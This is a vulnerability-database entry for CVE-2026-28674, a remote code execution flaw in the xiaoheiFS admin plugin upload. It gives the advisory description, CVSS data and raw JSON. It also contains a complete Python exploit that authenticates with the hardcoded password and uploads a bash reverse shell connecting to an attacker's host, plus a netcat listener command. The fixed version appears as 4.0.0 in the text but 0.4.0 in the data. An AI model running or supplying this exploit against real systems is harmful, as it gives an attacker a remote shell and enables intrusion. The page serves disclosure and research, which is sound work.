Security Vulnerability Report
中文
CVE-2026-28674 CVSS 7.2 HIGH

CVE-2026-28674

Published: 2026-03-18 01:16:05
Last Modified: 2026-03-23 17:57:35
Source: [email protected]

Description

xiaoheiFS is a self-hosted financial and operational system for cloud service businesses. In versions up to and including 0.3.15, the `AdminPaymentPluginUpload` endpoint lets admins upload any file to `plugins/payment/`. It only checks a hardcoded password (`qweasd123456`) and ignores file content. A background watcher (`StartWatcher`) then scans this folder every 5 seconds. If it finds a new executable, it runs it immediately, resulting in RCE. Version 4.0.0 fixes the issue.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:danvei233:xiaoheifs:*:*:*:*:*:*:*:* - VULNERABLE
xiaoheiFS <= 0.3.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-28674 PoC - xiaoheiFS Plugin Upload RCE xiaoheiFS versions <= 0.3.15 allow remote code execution via AdminPaymentPluginUpload endpoint. The endpoint uses hardcoded password 'qweasd123456' and StartWatcher auto-executes uploaded files. """ import requests import argparse import time import sys def exploit(target_url, password, lhost, lport): """ Exploit the plugin upload vulnerability to achieve RCE """ upload_url = f"{target_url}/admin/plugin/upload" # Create malicious plugin file with reverse shell payload # The StartWatcher will execute this file after 5 seconds reverse_shell = f'''#!/bin/bash bash -i >& /dev/tcp/{lhost}/{lport} 0>&1 ''' headers = { "Authorization": password, } files = { "file": ("shell.sh", reverse_shell.encode(), "application/x-sh") } print(f"[*] Target: {target_url}") print(f"[*] Using hardcoded password: {password}") print(f"[*] Uploading malicious plugin...") try: response = requests.post(upload_url, headers=headers, files=files, timeout=30) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Plugin uploaded successfully!") print("[*] Waiting for StartWatcher to execute the payload (5 seconds)...") time.sleep(6) print("[!] Check your listener for incoming reverse shell!") else: print(f"[-] Upload failed with status: {response.status_code}") print(f"[-] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") sys.exit(1) if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2026-28674 PoC - xiaoheiFS RCE") parser.add_argument("-t", "--target", required=True, help="Target URL (e.g., http://192.168.1.100:8080)") parser.add_argument("-p", "--password", default="qweasd123456", help="Hardcoded authentication password") parser.add_argument("-lh", "--lhost", required=True, help="Attacker listener host IP") parser.add_argument("-lp", "--lport", required=True, type=int, help="Attacker listener port") args = parser.parse_args() exploit(args.target, args.password, args.lhost, args.lport) # Usage: # Attacker side: nc -lvnp 4444 # Run PoC: python3 cve-2026-28674.py -t http://target:8080 -lh 192.168.1.100 -lp 4444

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28674", "sourceIdentifier": "[email protected]", "published": "2026-03-18T01:16:05.280", "lastModified": "2026-03-23T17:57:34.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "xiaoheiFS is a self-hosted financial and operational system for cloud service businesses. In versions up to and including 0.3.15, the `AdminPaymentPluginUpload` endpoint lets admins upload any file to `plugins/payment/`. It only checks a hardcoded password (`qweasd123456`) and ignores file content. A background watcher (`StartWatcher`) then scans this folder every 5 seconds. If it finds a new executable, it runs it immediately, resulting in RCE. Version 4.0.0 fixes the issue."}, {"lang": "es", "value": "xiaoheiFS es un sistema financiero y operativo autohospedado para negocios de servicios en la nube. En versiones hasta la 0.3.15 inclusive, el endpoint 'AdminPaymentPluginUpload' permite a los administradores subir cualquier archivo a 'plugins/payment/'. Solo verifica una contraseña codificada ('qweasd123456') e ignora el contenido del archivo. Un observador en segundo plano ('StartWatcher') escanea esta carpeta cada 5 segundos. Si encuentra un nuevo ejecutable, lo ejecuta inmediatamente, lo que resulta en RCE. La versión 4.0.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}, {"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:danvei233:xiaoheifs:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.4.0", "matchCriteriaId": "D0180A96-D887-4385-AC4F-58ECEAAC15D3"}]}]}], "references": [{"url": "https://github.com/danvei233/xiaoheiFS/security/advisories/GHSA-hcj4-gfvq-qv4p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/danvei233/xiaoheiFS/security/advisories/GHSA-hcj4-gfvq-qv4p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.